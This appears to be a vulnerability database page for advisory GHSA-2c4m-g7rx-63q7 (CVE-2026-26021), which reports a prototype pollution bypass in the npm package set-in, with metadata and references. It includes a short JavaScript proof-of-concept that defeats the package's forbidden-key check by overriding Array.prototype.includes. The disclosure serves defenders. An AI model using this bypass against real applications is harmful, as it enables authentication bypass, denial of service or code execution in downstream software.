GHSA-2C4M-G7RX-63Q7

Vulnerability from github – Published: 2026-02-11 15:13 – Updated: 2026-02-12 14:19
VLAI?
Summary
set-in Affected by Prototype Pollution
Details

Summary

A prototype pollution vulnerability exists in the the npm package set-in (>=2.0.1). Despite a previous fix that attempted to mitigate prototype pollution by checking whether user input contained a forbidden key, it is still possible to pollute Object.prototype via a crafted input using Array.prototype. This has been fixed in version 2.0.5.

Details

The vulnerability resides in line 28 of https://github.com/ahdinosaur/set-in/blob/master/index.js where includes() function is used to check whether user provided input contain forbidden strings.

PoC

Steps to reproduce

  1. Install latest version of set-in using npm install or cloning from git
  2. Run the following code snippet:
Array.prototype.includes = () => false; 
const si = require('set-in');
const obj = {};
console.log({}.polluted);
si(obj, [
    'constructor',
    'prototype',
    'polluted'
], 'yes');
console.log('{ ' + obj.polluted + ', ' + 'yes' + ' }');  // prints yes -> indicating that the patch was bypassed and prototype pollution occurred

Expected behavior

Prototype pollution should be prevented and {} should not gain new properties. This should be printed on the console:

undefined
undefined OR throw an Error

Actual behavior

Object.prototype is polluted This is printed on the console:

undefined 
yes

Impact

This is a prototype pollution vulnerability, which can have severe security implications depending on how set-in is used by downstream applications. Any application that processes attacker-controlled input using this package may be affected. It could potentially lead to the following problems: 1. Authentication bypass 2. Denial of service 3. Remote code execution (if polluted property is passed to sinks like eval or child_process)

Severity ?
9.4 (Critical)
CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "set-in"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.0.1"
            },
            {
              "fixed": "2.0.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-26021"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-11T15:13:28Z",
    "nvd_published_at": "2026-02-11T22:15:52Z",
    "severity": "CRITICAL"
  },
  "details": "### Summary\nA prototype pollution vulnerability exists in the the npm package set-in (\u003e=2.0.1). Despite a previous fix that attempted to mitigate prototype pollution by checking whether user input contained a forbidden key, it is still possible to pollute Object.prototype via a crafted input using Array.prototype. This has been fixed in version 2.0.5.\n\n### Details\nThe vulnerability resides in line 28 of https://github.com/ahdinosaur/set-in/blob/master/index.js where includes() function is used to check whether user provided input contain forbidden strings.\n\n### PoC\n#### Steps to reproduce\n1. Install latest version of set-in using npm install or cloning from git\n2. Run the following code snippet:\n\n```javascript\nArray.prototype.includes = () =\u003e false; \nconst si = require(\u0027set-in\u0027);\nconst obj = {};\nconsole.log({}.polluted);\nsi(obj, [\n    \u0027constructor\u0027,\n    \u0027prototype\u0027,\n    \u0027polluted\u0027\n], \u0027yes\u0027);\nconsole.log(\u0027{ \u0027 + obj.polluted + \u0027, \u0027 + \u0027yes\u0027 + \u0027 }\u0027);  // prints yes -\u003e indicating that the patch was bypassed and prototype pollution occurred\n```\n\n#### Expected behavior\nPrototype pollution should be prevented and {} should not gain new properties.\nThis should be printed on the console:\n```\nundefined\nundefined OR throw an Error\n```\n\n#### Actual behavior\nObject.prototype is polluted\nThis is printed on the console:\n```\nundefined \nyes\n```\n\n### Impact\nThis is a prototype pollution vulnerability, which can have severe security implications depending on how set-in is used by downstream applications. Any application that processes attacker-controlled input using this package may be affected.\nIt could potentially lead to the following problems:\n1. Authentication bypass\n2. Denial of service\n3. Remote code execution (if polluted property is passed to sinks like eval or child_process)",
  "id": "GHSA-2c4m-g7rx-63q7",
  "modified": "2026-02-12T14:19:12Z",
  "published": "2026-02-11T15:13:28Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/ahdinosaur/set-in/security/advisories/GHSA-2c4m-g7rx-63q7"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26021"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ahdinosaur/set-in/pull/6"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ahdinosaur/set-in/commit/34842cc02de3fd65d6f8bd0b268347e7b390125b"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ahdinosaur/set-in/commit/6bad255961d379e4b1f5fbc52ef9dc8420816f24"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ahdinosaur/set-in/commit/b8e1dabfdbd35c8d604b6324e01d03f280256c3d"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ahdinosaur/set-in/commit/d87c1a09fa2edb55cd76440a67d83d1cb828df11"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/ahdinosaur/set-in"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
      "type": "CVSS_V4"
    }
  ],
  "summary": "set-in Affected by Prototype Pollution"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.